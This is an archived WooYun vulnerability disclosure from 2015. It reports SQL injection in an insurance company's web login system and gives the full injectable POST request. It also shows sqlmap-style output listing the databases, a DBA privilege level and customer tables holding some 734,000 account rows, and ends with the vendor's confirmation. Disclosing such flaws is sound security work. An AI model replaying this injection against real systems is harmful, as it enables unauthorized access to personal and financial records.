乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-11: 细节已通知厂商并且等待厂商处理中 2015-09-15: 厂商已经确认,细节仅向厂商公开 2015-09-25: 细节向核心白帽子及相关领域专家公开 2015-10-05: 细节向普通白帽子公开 2015-10-15: 细节向实习白帽子公开 2015-10-30: 细节向公众公开
RT
站点:http://cbs.cninsure.net/
机构编码每次输入都会进行查询,直接再次告诉我这里有注入。测试注入:
POST /common/easytree/easytree.jsp HTTP/1.1Accept: */*Accept-Language: zh-cnReferer: http://cbs.cninsure.net/logon/Login.jspcontenttype: text/html;charset=UTF-8Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)Host: cbs.cninsure.netContent-Length: 36Proxy-Connection: Keep-AlivePragma: no-cacheCookie: __utmt=1; __utma=127353055.380070043.1441936518.1441936518.1441936518.1; __utmb=127353055.2.10.1441936518; __utmc=127353055; __utmz=127353055.1441936518.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=0000DresiVM8fBpbEWamFIsZjq3:14jf1nbfktreetype=OperatorCom1&UserCode=admin
权限(DBA):
数据库:
available databases [25]:[*] BELIMG[*] BELVP[*] CBS_DE[*] CBSAGENT[*] CBSCODE[*] CBSCUSTOMER[*] CBSFINANCE[*] CBSINDEX[*] CBSOPR[*] CBSPOLICY[*] CBSPRODUCT[*] CBSRULE[*] CBSSYSTEM[*] CBSTEMPDATA[*] DBSNMP[*] OUTLN[*] PERFSTAT[*] RMAN[*] SCOTT[*] SYS[*] SYSTEM[*] TEST[*] TESTSUNHAN[*] TSMSYS[*] WMSYS
CBSCUSTOMER:
[39 tables]+---------------------------+| FDCORPCLIENTTYPE || FDCUSACCOUNT || FDCUSASSIGN || FDCUSTOBJECTAGRI || FDCUSTOBJECTCAR || FDCUSTOBJECTCARGO || FDCUSTOBJECTCONSTRUCT || FDCUSTOBJECTCREDIT || FDCUSTOBJECTDEVICE || FDCUSTOBJECTHOUSE || FDCUSTOBJECTINVEST || FDCUSTOBJECTLIAB || FDCUSTOBJECTLOAN || FDCUSTOBJECTPROP || FDCUSTOBJECTSHIP || FDCUSTOMERADDRESS || FDCUSTOMERBACK || FDCUSTOMEREDITINFO || FDGROUP || FDGROUPPRE || FDGRPADDRESS || FDGRPPER || FDPERRELA || FDPERSON || FDPERSONADDRESS || FDPERSONPRE || FLACLAIMDEFAULTDATA || FLANEWAUDITORINSCOM || FLANEWCAR || FLANEWCARRUNINFO || FLANEWCLIENT || FLANEWCLIENTCAR || FLANEWCLIENTDRIVERLICENSE || FLANEWINSCOM || FLAPROTOCOLUSEDCOM || FLAREPLYREMARKCODE || FLAREPLYREMARKDATA || FLAREPLYREMARKVALUE || SFM_FILEINDEX |+---------------------------+
FDCUSACCOUNT(734490多条)
我不会,我要去写代码了。(=_=#)
危害等级:中
漏洞Rank:10
确认时间:2015-09-15 13:58
非常感谢!
暂无